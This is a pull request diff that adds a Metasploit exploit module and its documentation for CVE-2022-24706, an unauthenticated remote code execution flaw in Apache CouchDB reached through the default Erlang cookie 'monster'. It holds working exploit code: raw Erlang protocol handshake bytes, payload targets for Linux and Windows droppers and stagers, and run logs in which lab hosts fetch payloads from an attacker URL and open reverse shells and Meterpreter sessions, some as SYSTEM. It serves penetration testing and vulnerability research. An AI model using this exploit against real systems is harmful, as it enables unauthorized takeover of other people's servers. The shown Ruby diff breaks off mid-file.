### PR TITLE
Apache CouchDB Erlang RCE module CVE-2022-24706

### DIFF
--- a/documentation/modules/exploit/multi/http/apache_couchdb_erlang_rce.md
+++ b/documentation/modules/exploit/multi/http/apache_couchdb_erlang_rce.md
@@ -84,15 +84,16 @@ Click the installer to launch, accept the licensing agreement. CouchDB should no
 ## Scenarios
 ### Target: Unix Command, Ubuntu 20.04, Apache CouchDB 3.2.1
 ```
-msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run 
+msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
 
-[*] Started reverse double SSL handler on 172.16.199.1:4443
-[*] 172.16.199.164:4369 - Connecting to the EDPM socket...
-[*] 172.16.199.164:4369 - res: name couchdb at port 45335
-
-[*] 172.16.199.164:4369 - Success
-[*] 172.16.199.164:4369 - Connecting to Erlang Server...
-[*] 172.16.199.164:4369 - Connected
+[*] Started reverse double SSL handler on 172.16.199.1:4444
+[*] 172.16.199.164:4369 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.199.164:4369 - Attempting to connect to the Erlang Port Mapper Daemon (EDPM) socket at: 172.16.199.164:4369...
+[*] 172.16.199.164:4369 - Successfully found EDPM socket
+[*] 172.16.199.164:4369 - Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...
+[*] 172.16.199.164:4369 - Connection successful
+[*] 172.16.199.164:4369 - Erlang challenge and response completed successfully
+[+] 172.16.199.164:4369 - The target is vulnerable. Successfully connected to the Erlang Server with cookie: "monster"
 [*] 172.16.199.164:4369 - sending payload...
 [*] Accepted the first client connection...
 [*] Accepted the second client connection...
@@ -116,19 +117,19 @@ Linux ubuntu 5.15.0-50-generic #56~20.04.1-Ubuntu SMP Tue Sep 27 15:51:29 UTC 20
 msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
 
 [*] Started reverse TCP handler on 172.16.199.1:4444
-[*] 172.16.199.164:4369 - Connecting to the EDPM socket...
-[*] 172.16.199.164:4369 - res: name couchdb at port 34207
-
-[*] 172.16.199.164:4369 - Success
-[*] 172.16.199.164:4369 - Connecting to Erlang Server...
-[*] 172.16.199.164:4369 - Connected
-[*] 172.16.199.164:4369 - Erlang challenge and reponse completed successfully
-[*] 172.16.199.164:4369 - Using URL: http://172.16.199.1:8080/rVxqPnXisNqih3
+[*] 172.16.199.164:4369 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.199.164:4369 - Attempting to connect to the Erlang Port Mapper Daemon (EDPM) socket at: 172.16.199.164:4369...
+[*] 172.16.199.164:4369 - Successfully found EDPM socket
+[*] 172.16.199.164:4369 - Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...
+[*] 172.16.199.164:4369 - Connection successful
+[*] 172.16.199.164:4369 - Erlang challenge and response completed successfully
+[+] 172.16.199.164:4369 - The target is vulnerable. Successfully connected to the Erlang Server with cookie: "monster"
+[*] 172.16.199.164:4369 - Using URL: http://172.16.199.1:8080/xiNdbG3
 [*] 172.16.199.164:4369 - sending payload...
-[*] 172.16.199.164:4369 - Client 172.16.199.164 (Wget/1.20.3 (linux-gnu)) requested /rVxqPnXisNqih3
+[*] 172.16.199.164:4369 - Client 172.16.199.164 (Wget/1.20.3 (linux-gnu)) requested /xiNdbG3
 [*] 172.16.199.164:4369 - Sending payload to 172.16.199.164 (Wget/1.20.3 (linux-gnu))
-[*] Meterpreter session 8 opened (172.16.199.1:4444 -> 172.16.199.164:59040) at 2022-10-14 17:19:38 -0400
-[*] 172.16.199.164:4369 - Command Stager progress - 100.00% done (119/119 bytes)
+[*] Meterpreter session 10 opened (172.16.199.1:4444 -> 172.16.199.164:57710) at 2022-10-17 18:33:57 -0400
+[*] 172.16.199.164:4369 - Command Stager progress - 100.00% done (112/112 bytes)
 [*] 172.16.199.164:4369 - Server stopped.
 
 meterpreter > getuid
@@ -147,15 +148,15 @@ meterpreter > exit
 msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
 
 [*] Started reverse TCP handler on 172.16.199.1:4444
-[*] 172.16.199.137:4369 - Connecting to the EDPM socket...
-[*] 172.16.199.137:4369 - res: name couchdb at port 49679
-
-[*] 172.16.199.137:4369 - Success
-[*] 172.16.199.137:4369 - Connecting to Erlang Server...
-[*] 172.16.199.137:4369 - Connected
-[*] 172.16.199.137:4369 - Erlang challenge and reponse completed successfully
+[*] 172.16.199.137:4369 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.199.137:4369 - Attempting to connect to the Erlang Port Mapper Daemon (EDPM) socket at: 172.16.199.137:4369...
+[*] 172.16.199.137:4369 - Successfully found EDPM socket
+[*] 172.16.199.137:4369 - Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...
+[*] 172.16.199.137:4369 - Connection successful
+[*] 172.16.199.137:4369 - Erlang challenge and response completed successfully
+[+] 172.16.199.137:4369 - The target is vulnerable. Successfully connected to the Erlang Server with cookie: "monster"
 [*] 172.16.199.137:4369 - sending payload...
-[*] Powershell session session 6 opened (172.16.199.1:4444 -> 172.16.199.137:49758) at 2022-10-14 17:14:02 -0400
+[*] Powershell session session 11 opened (172.16.199.1:4444 -> 172.16.199.137:49762) at 2022-10-17 18:44:16 -0400
 
 
 Shell Banner:
@@ -179,15 +180,13 @@ PS C:\CouchDB>
 msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
 
 [*] Started reverse TCP handler on 172.16.199.1:4444
-[*] 172.16.199.137:4369 - Connecting to the EDPM socket...
-[*] 172.16.199.137:4369 - res: name couchdb at port 49679
-
-[*] 172.16.199.137:4369 - Success
-[*] 172.16.199.137:4369 - Connecting to Erlang Server...
-[*] 172.16.199.137:4369 - Connected
-[*] 172.16.199.137:4369 - Erlang challenge and reponse completed successfully
-[*] 172.16.199.137:4369 - sending payload...
-[*] 172.16.199.137:4369 - Command Stager progress -   0.66% done (2046/308720 bytes)
+[*] 172.16.199.137:4369 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.199.137:4369 - Attempting to connect to the Erlang Port Mapper Daemon (EDPM) socket at: 172.16.199.137:4369...
+[*] 172.16.199.137:4369 - Successfully found EDPM socket
+[*] 172.16.199.137:4369 - Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...
+[*] 172.16.199.137:4369 - Connection successful
+[*] 172.16.199.137:4369 - Erlang challenge and response completed successfully
+[+] 172.16.199.137:4369 - The target is vulnerable. Successfully connected to the Erlang Server with cookie: "monster"
 [*] 172.16.199.137:4369 - sending payload...
 ...
 [*] 172.16.199.137:4369 - Command Stager progress -  99.41% done (306900/308720 bytes)
@@ -213,13 +212,13 @@ meterpreter >
 msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
 
 [*] Started reverse TCP handler on 172.16.199.1:4444
-[*] 172.16.199.137:4369 - Connecting to the EDPM socket...
-[*] 172.16.199.137:4369 - res: name couchdb at port 49679
-
-[*] 172.16.199.137:4369 - Success
-[*] 172.16.199.137:4369 - Connecting to Erlang Server...
-[*] 172.16.199.137:4369 - Connected
-[*] 172.16.199.137:4369 - Erlang challenge and reponse completed successfully
+[*] 172.16.199.137:4369 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.199.137:4369 - Attempting to connect to the Erlang Port Mapper Daemon (EDPM) socket at: 172.16.199.137:4369...
+[*] 172.16.199.137:4369 - Successfully found EDPM socket
+[*] 172.16.199.137:4369 - Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...
+[*] 172.16.199.137:4369 - Connection successful
+[*] 172.16.199.137:4369 - Erlang challenge and response completed successfully
+[+] 172.16.199.137:4369 - The target is vulnerable. Successfully connected to the Erlang Server with cookie: "monster"
 [*] 172.16.199.137:4369 - sending payload...
 [*] 172.16.199.137:4369 - Command Stager progress -  20.94% done (2046/9770 bytes)
 [*] 172.16.199.137:4369 - sending payload...
@@ -230,7 +229,7 @@ msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
 [*] 172.16.199.137:4369 - Command Stager progress -  83.77% done (8184/9770 bytes)
 [*] 172.16.199.137:4369 - sending payload...
 [*] Sending stage (222278 bytes) to 172.16.199.137
-[*] Meterpreter session 7 opened (172.16.199.1:4444 -> 172.16.199.137:49760) at 2022-10-14 17:16:00 -0400
+[*] Meterpreter session 12 opened (172.16.199.1:4444 -> 172.16.199.137:49773) at 2022-10-17 18:45:56 -0400
 [*] 172.16.199.137:4369 - Command Stager progress - 100.00% done (9770/9770 bytes)
 
 meterpreter > getuid

--- a/documentation/modules/exploit/multi/http/apache_couchdb_erlang_rce.md
+++ b/documentation/modules/exploit/multi/http/apache_couchdb_erlang_rce.md
@@ -50,8 +50,8 @@ find /opt/couchdb -type d -exec chmod 0770 {} \;
 Update the permissions for the ini files:
 `chmod 0644 /opt/couchdb/etc/*`
 
-Change the bind address of [chttpd] and [httpd] in `</path/to/couchdb/>etc/default.ini` from 127.0.0.1 to 0.0.0.0 or
-or whatever you prefer
+Change the bind address of `[chttpd]` and `[httpd]` in `</path/to/couchdb/>/etc/default.ini` from 127.0.0.1 to 0.0.0.0 or
+or whatever you prefer.
 ```
 [httpd]
 port = 5986
@@ -74,7 +74,7 @@ Download the following installer:
 
 Click the installer to launch, accept the licensing agreement. CouchDB should now be installed.
 
-Change the bind address of [chttpd] and [httpd] in `</path/to/couchdb/>etc/default.ini` from 127.0.0.1 to 0.0.0.0 or
+Change the bind address of `[chttpd]` and `[httpd]` in `</path/to/couchdb/>etc/default.ini` from 127.0.0.1 to 0.0.0.0 or
 or whatever you prefer
 ```
 [httpd]
@@ -85,7 +85,9 @@ bind_address = 0.0.0.0
 port = 5984
 bind_address = 0.0.0.0
 ```
-Navigate to `http://<IP-ADDRESS>:5984/_utils/` to verify the install
+Restart the `Apache CouchDB` service: `net stop "Apache CouchDB"` and then `net start "Apache CouchDB"` in an administrative console.
+Then navigate to `http://<IP-ADDRESS>:5984/_utils/` to verify that the install completed successfully. You should see a page with
+`Databases` at the top of the screen and a navigation bar to the left of the screen if all goes well.
 
 ## Verification Steps
 
@@ -96,7 +98,7 @@ Navigate to `http://<IP-ADDRESS>:5984/_utils/` to verify the install
 1. Verify: That you receive a session as the user that is running the ApacheDB application.
 
 ## Scenarios
-### Target: Unix Command, Ubuntu 20.04, Apache CouchDB 3.2.1
+### Unix Command, Ubuntu 20.04, Apache CouchDB 3.2.1
 ```
 msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
 
@@ -127,7 +129,7 @@ uname -a
 Linux ubuntu 5.15.0-50-generic #56~20.04.1-Ubuntu SMP Tue Sep 27 15:51:29 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
 ```
 
-### Target: Linux Dropper, Ubuntu 20.04, Apache CouchDB 3.2.1
+### Linux Dropper, Ubuntu 20.04, Apache CouchDB 3.2.1
 ```
 msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
 
@@ -158,7 +160,7 @@ Meterpreter  : x86/linux
 meterpreter > exit
 ```
 
-### Target: Windows Command, Windows 10, Apache CouchDB 2.3.1
+### Windows Command, Windows 10, Apache CouchDB 2.3.1
 ```
 msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
 
@@ -190,7 +192,7 @@ OS Version:                10.0.19042 N/A Build 19042
 PS C:\CouchDB>
 ```
 
-### Target  Windows Dropper, Windows 10, Apache CouchDB 2.3.1
+### Windows Dropper, Windows 10, Apache CouchDB 2.3.1
 ```
 msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
 
@@ -222,7 +224,7 @@ Meterpreter     : x64/windows
 meterpreter >
 ```
 
-### Target: PowerShell Stager, Windows 10, Apache CouchDB 2.3.1
+### PowerShell Stager, Windows 10, Apache CouchDB 2.3.1
 ```
 msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
 

--- a/documentation/modules/exploit/multi/http/apache_couchdb_erlang_rce.md
+++ b/documentation/modules/exploit/multi/http/apache_couchdb_erlang_rce.md
@@ -51,7 +51,7 @@ find /opt/couchdb -type d -exec chmod 0770 {} \;
 Update the permissions for the ini files:
 `chmod 0644 /opt/couchdb/etc/*`
 
-Change the bind address of [chttpd] and [httpd] in `/path/to/couchdb/etc/default.ini` from 127.0.0.1 to 0.0.0.0 or
+Change the bind address of [chttpd] and [httpd] in `</path/to/couchdb/>etc/default.ini` from 127.0.0.1 to 0.0.0.0 or
 or whatever you prefer
 ```
 [httpd]
@@ -66,6 +66,8 @@ bind_address = 0.0.0.0
 You can start the CouchDB server by running:
 `sudo -i -u couchdb couchdb/bin/couchdb`
 
+Navigate to `http://<IP-ADDRESS>:5984/_utils/` to verify the install
+
 #### Windows
 
 Download the following installer:
@@ -73,13 +75,26 @@ Download the following installer:
 
 Click the installer to launch, accept the licensing agreement. CouchDB should now be installed.
 
+Change the bind address of [chttpd] and [httpd] in `</path/to/couchdb/>etc/default.ini` from 127.0.0.1 to 0.0.0.0 or
+or whatever you prefer
+```
+[httpd]
+port = 5986
+bind_address = 0.0.0.0
+[chttpd]
+; These settings affect the main, clustered port (5984 by default).
+port = 5984
+bind_address = 0.0.0.0
+```
+Navigate to `http://<IP-ADDRESS>:5984/_utils/` to verify the install
+
 ## Verification Steps
 
 1. Start msfconsole
 1. Do: `use exploit/multi/http/apache_couchdb_erlang_rce`
-1. Set the `RHOST`, `LHOST`
-1. Run the module
-1. Receive a session as the user that is running the ApacheDB application.
+1. Set the `RHOST` and `LHOST` values
+1. `exploit`
+1. Verify: That you receive a session as the user that is running the ApacheDB application.
 
 ## Scenarios
 ### Target: Unix Command, Ubuntu 20.04, Apache CouchDB 3.2.1
@@ -112,6 +127,7 @@ uid=128(couchdb) gid=134(couchdb) groups=134(couchdb)
 uname -a
 Linux ubuntu 5.15.0-50-generic #56~20.04.1-Ubuntu SMP Tue Sep 27 15:51:29 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
 ```
+
 ### Target: Linux Dropper, Ubuntu 20.04, Apache CouchDB 3.2.1
 ```
 msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run

--- a/documentation/modules/exploit/multi/http/apache_couchdb_erlang_rce.md
+++ b/documentation/modules/exploit/multi/http/apache_couchdb_erlang_rce.md
@@ -1,0 +1,246 @@
+## Vulnerable Application
+### Description
+This module exploits CVE-2022-24706, an unauthenticated RCE vulnerability in Apache CouchDB in versions 3.2.1 and below.
+
+Apache CouchDB is written in Erlang and so it has built-in support for distributed computing (clustering). The
+cluster nodes communicate using the Erlang/OTP Distribution Protocol, which provides for the possibility of executing
+OS commands request.
+
+In order to connect and run OS commands, one needs to know the secret phrase or in Erlang terms the "cookie". The CouchDB
+installer before version 3.2.1, by default, sets the cookie to "monster".
+
+### Setup
+#### Ubuntu 20.04
+Create a CouchDB user:
+```
+sudo adduser --system \
+             --home /opt/couchdb \
+             --no-create-home \
+             --shell /bin/bash \
+             --group --gecos \
+             "CouchDB Administrator" couchdb
+sudo passwd couchdb
+```
+
+Install dependencies:
+```
+sudo apt-get --no-install-recommends -y install \
+    build-essential pkg-config erlang erlang-reltool \
+    libicu-dev libmozjs-68-dev python3
+sudo apt-get -y install pip sphinx-doc sphinx-common
+sudo pip install --upgrade sphinx_rtd_theme nose requests hypothesis
+```
+
+Download vulnerable version of CouchDB:
+```
+wget https://downloads.apache.org/couchdb/source/3.2.1/apache-couchdb-3.2.1.tar.gz
+gunzip apache-couchdb-3.2.1.tar.gz
+tar -xvf apache-couchdb-3.2.1.tar
+cp 
+```
+
+Copy the built couchdb release to the new user's home directory:
+`cp -R /path/to/couchdb/rel/couchdb /opt/couchdb`
+
+Change the ownership & permission of the CouchDB directories by running:
+```
+chown -R couchdb:couchdb /opt/couchdb
+find /opt/couchdb -type d -exec chmod 0770 {} \;
+```
+
+Update the permissions for the ini files:
+`chmod 0644 /opt/couchdb/etc/*`
+
+Change the bind address of [chttpd] and [httpd] in `/path/to/couchdb/etc/default.ini` from 127.0.0.1 to 0.0.0.0 or
+or whatever you prefer
+```
+[httpd]
+port = 5986
+bind_address = 0.0.0.0
+[chttpd]
+; These settings affect the main, clustered port (5984 by default).
+port = 5984
+bind_address = 0.0.0.0
+```
+
+You can start the CouchDB server by running:
+`sudo -i -u couchdb couchdb/bin/couchdb`
+
+#### Windows
+
+Download the following installer:
+`https://archive.apache.org/dist/couchdb/binary/win/2.3.1/apache-couchdb-2.3.1.msi`
+
+Click the installer to launch, accept the licensing agreement. CouchDB should now be installed.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/multi/http/apache_couchdb_erlang_rce`
+1. Set the `RHOST`, `LHOST`
+1. Run the module
+1. Receive a session as the user that is running the ApacheDB application.
+
+## Scenarios
+### Target: Unix Command, Ubuntu 20.04, Apache CouchDB 3.2.1
+```
+msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run 
+
+[*] Started reverse double SSL handler on 172.16.199.1:4443
+[*] 172.16.199.164:4369 - Connecting to the EDPM socket...
+[*] 172.16.199.164:4369 - res: name couchdb at port 45335
+
+[*] 172.16.199.164:4369 - Success
+[*] 172.16.199.164:4369 - Connecting to Erlang Server...
+[*] 172.16.199.164:4369 - Connected
+[*] 172.16.199.164:4369 - sending payload...
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo t82KLKYvcDd54em2;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "t82KLKYvcDd54em2\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 1 opened (172.16.199.1:4443 -> 172.16.199.164:53778) at 2022-10-13 14:09:49 -0400
+
+id
+uid=128(couchdb) gid=134(couchdb) groups=134(couchdb)
+uname -a
+Linux ubuntu 5.15.0-50-generic #56~20.04.1-Ubuntu SMP Tue Sep 27 15:51:29 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
+```
+### Target: Linux Dropper, Ubuntu 20.04, Apache CouchDB 3.2.1
+```
+msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] 172.16.199.164:4369 - Connecting to the EDPM socket...
+[*] 172.16.199.164:4369 - res: name couchdb at port 34207
+
+[*] 172.16.199.164:4369 - Success
+[*] 172.16.199.164:4369 - Connecting to Erlang Server...
+[*] 172.16.199.164:4369 - Connected
+[*] 172.16.199.164:4369 - Erlang challenge and reponse completed successfully
+[*] 172.16.199.164:4369 - Using URL: http://172.16.199.1:8080/rVxqPnXisNqih3
+[*] 172.16.199.164:4369 - sending payload...
+[*] 172.16.199.164:4369 - Client 172.16.199.164 (Wget/1.20.3 (linux-gnu)) requested /rVxqPnXisNqih3
+[*] 172.16.199.164:4369 - Sending payload to 172.16.199.164 (Wget/1.20.3 (linux-gnu))
+[*] Meterpreter session 8 opened (172.16.199.1:4444 -> 172.16.199.164:59040) at 2022-10-14 17:19:38 -0400
+[*] 172.16.199.164:4369 - Command Stager progress - 100.00% done (119/119 bytes)
+[*] 172.16.199.164:4369 - Server stopped.
+
+meterpreter > getuid
+Server username: couchdb
+meterpreter > sysinfo
+Computer     : 172.16.199.164
+OS           : Ubuntu 20.04 (Linux 5.15.0-50-generic)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > exit
+```
+
+### Target: Windows Command, Windows 10, Apache CouchDB 2.3.1
+```
+msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] 172.16.199.137:4369 - Connecting to the EDPM socket...
+[*] 172.16.199.137:4369 - res: name couchdb at port 49679
+
+[*] 172.16.199.137:4369 - Success
+[*] 172.16.199.137:4369 - Connecting to Erlang Server...
+[*] 172.16.199.137:4369 - Connected
+[*] 172.16.199.137:4369 - Erlang challenge and reponse completed successfully
+[*] 172.16.199.137:4369 - sending payload...
+[*] Powershell session session 6 opened (172.16.199.1:4444 -> 172.16.199.137:49758) at 2022-10-14 17:14:02 -0400
+
+
+Shell Banner:
+Windows PowerShell running as user DESKTOP-8ATHH6O$ on DESKTOP-8ATHH6O
+Copyright (C) Microsoft Corporation. All rights reserved.
+-----
+
+PS C:\CouchDB> whoami
+nt authority\system
+PS C:\CouchDB> systeminfo
+
+Host Name:                 DESKTOP-8ATHH6O
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.19042 N/A Build 19042
+...
+PS C:\CouchDB>
+```
+
+### Target  Windows Dropper, Windows 10, Apache CouchDB 2.3.1
+```
+msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] 172.16.199.137:4369 - Connecting to the EDPM socket...
+[*] 172.16.199.137:4369 - res: name couchdb at port 49679
+
+[*] 172.16.199.137:4369 - Success
+[*] 172.16.199.137:4369 - Connecting to Erlang Server...
+[*] 172.16.199.137:4369 - Connected
+[*] 172.16.199.137:4369 - Erlang challenge and reponse completed successfully
+[*] 172.16.199.137:4369 - sending payload...
+[*] 172.16.199.137:4369 - Command Stager progress -   0.66% done (2046/308720 bytes)
+[*] 172.16.199.137:4369 - sending payload...
+...
+[*] 172.16.199.137:4369 - Command Stager progress -  99.41% done (306900/308720 bytes)
+[*] 172.16.199.137:4369 - sending payload...
+[*] Meterpreter session 5 opened (172.16.199.1:4444 -> 172.16.199.137:49749) at 2022-10-14 17:09:31 -0400
+[*] 172.16.199.137:4369 - Command Stager progress - 100.00% done (308720/308720 bytes)
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-8ATHH6O
+OS              : Windows 10 (10.0 Build 19042).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter >
+```
+
+### Target: PowerShell Stager, Windows 10, Apache CouchDB 2.3.1
+```
+msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] 172.16.199.137:4369 - Connecting to the EDPM socket...
+[*] 172.16.199.137:4369 - res: name couchdb at port 49679
+
+[*] 172.16.199.137:4369 - Success
+[*] 172.16.199.137:4369 - Connecting to Erlang Server...
+[*] 172.16.199.137:4369 - Connected
+[*] 172.16.199.137:4369 - Erlang challenge and reponse completed successfully
+[*] 172.16.199.137:4369 - sending payload...
+[*] 172.16.199.137:4369 - Command Stager progress -  20.94% done (2046/9770 bytes)
+[*] 172.16.199.137:4369 - sending payload...
+[*] 172.16.199.137:4369 - Command Stager progress -  41.88% done (4092/9770 bytes)
+[*] 172.16.199.137:4369 - sending payload...
+[*] 172.16.199.137:4369 - Command Stager progress -  62.82% done (6138/9770 bytes)
+[*] 172.16.199.137:4369 - sending payload...
+[*] 172.16.199.137:4369 - Command Stager progress -  83.77% done (8184/9770 bytes)
+[*] 172.16.199.137:4369 - sending payload...
+[*] Sending stage (222278 bytes) to 172.16.199.137
+[*] Meterpreter session 7 opened (172.16.199.1:4444 -> 172.16.199.137:49760) at 2022-10-14 17:16:00 -0400
+[*] 172.16.199.137:4369 - Command Stager progress - 100.00% done (9770/9770 bytes)
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-8ATHH6O
+OS              : Windows 10 (10.0 Build 19042).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+```

--- a/documentation/modules/exploit/multi/http/apache_couchdb_erlang_rce.md
+++ b/documentation/modules/exploit/multi/http/apache_couchdb_erlang_rce.md
@@ -4,10 +4,10 @@ This module exploits CVE-2022-24706, an unauthenticated RCE vulnerability in Apa
 
 Apache CouchDB is written in Erlang and so it has built-in support for distributed computing (clustering). The
 cluster nodes communicate using the Erlang/OTP Distribution Protocol, which provides for the possibility of executing
-OS commands request.
+OS command requests as the user running the software.
 
 In order to connect and run OS commands, one needs to know the secret phrase or in Erlang terms the "cookie". The CouchDB
-installer before version 3.2.1, by default, sets the cookie to "monster".
+installer in versions 3.2.1 and below, by default, sets the cookie to "monster".
 
 ### Setup
 #### Ubuntu 20.04
@@ -36,7 +36,6 @@ Download vulnerable version of CouchDB:
 wget https://downloads.apache.org/couchdb/source/3.2.1/apache-couchdb-3.2.1.tar.gz
 gunzip apache-couchdb-3.2.1.tar.gz
 tar -xvf apache-couchdb-3.2.1.tar
-cp 
 ```
 
 Copy the built couchdb release to the new user's home directory:

--- a/modules/exploits/multi/http/apache_couchdb_erlang_rce.rb
+++ b/modules/exploits/multi/http/apache_couchdb_erlang_rce.rb
@@ -7,48 +7,39 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
   require 'digest'
 
-  # TARGET = ""
-  # EPMD_PORT = 4369 # Default Erlang distributed port
-  # COOKIE = "monster" # Default Erlang cookie for CouchDB
-  # ERLNAG_PORT = 0
-  # EPM_NAME_CMD = "\x00\x01\x6e" # Request for nodes list
-
-  # Some data:
-  # NAME_MSG  = "\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA".unpack('c*')
-  # CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04"
-  # CTRL_DATA  = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03"
-  # CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex"
-
+  EPM_NAME_CMD = "\x00\x01\x6e".freeze
+  NAME_MSG = "\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA".freeze
+  CHALLENGE_REPLY = "\x00\x15r\x01\x02\x03\x04".freeze
+  CTRL_DATA = "\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex".freeze
+  COOKIE = 'monster'.freeze
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name'        => 'Apache Couchdb Erlang Rce',
-        'Description' => %q(
-          Placeholder
-        ),
-        'Author'      =>
-          [
-            'Placeholder', # discovery
-            'Placeholder'  # module
-          ],
-        # 'References'  =>
-        #   [
-        #     [ 'EDB', '' ],
-        #     [ 'URL', ''],
-        #     [ 'CVE', '']
-        #   ],
-        'License'        => MSF_LICENSE,
-        # 'Platform'       => '',
-        'Privileged'     => false ,
-        'DefaultOptions' =>
-          {
-            'PAYLOAD' => 'cmd/unix/reverse_bash'
-          },
-        'Arch'           => [ ARCH_CMD ],
+        'Name' => 'Apache Couchdb Erlang RCE',
+        'Description' => %q{
+          In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without
+          authenticating and gain admin privileges.
+        },
+        'Author'	=> [
+          '1F98D',            # Erlang Cookie RCE discovery
+          'Konstantin Burov', # Apache CouchDB Erlang Cookie exploit
+          '_sadshade',        # Apache CouchDB Erlang Cookie exploit
+          'jheysel-r7',       # Msf Module
+        ],
+        'References' => [
+          [ 'EDB', '49418' ],
+          [ 'URL', 'https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit'],
+          [ 'CVE', '2022-24706'],
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => ['win', 'linux'],
+        'Privileged' => false,
+        'Arch' => [ ARCH_CMD ],
         'Targets' => [
           [
             'Unix Command',
@@ -58,19 +49,65 @@ class MetasploitModule < Msf::Exploit::Remote
               'Type' => :unix_cmd,
               'DefaultOptions' => {
                 'PAYLOAD' => 'cmd/unix/reverse_openssl'
-              },
-              'Payload' => {
-                'Append' => ' & disown'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => :wget,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'CmdStagerFlavor' => :certutil,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'PowerShell Stager',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :psh_stager,
+              'CmdStagerFlavor' => :certutil,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
               }
             }
           ]
-          ],
+        ],
         'DefaultTarget' => 0,
-        'DisclosureDate' => '2000-01-01'
-      )
+        'DisclosureDate' => '2022-01-21',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      ),
     )
 
-    # Opt::ERLANG_PORT(35703)],
     register_options(
       [
         Opt::RPORT(4369)
@@ -78,103 +115,93 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  EPM_NAME_CMD = "\x00\x01\x6e"
-  NAME_MSG = "\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA"
-  CHALLENGE_REPLY = "\x00\x15r\x01\x02\x03\x04"
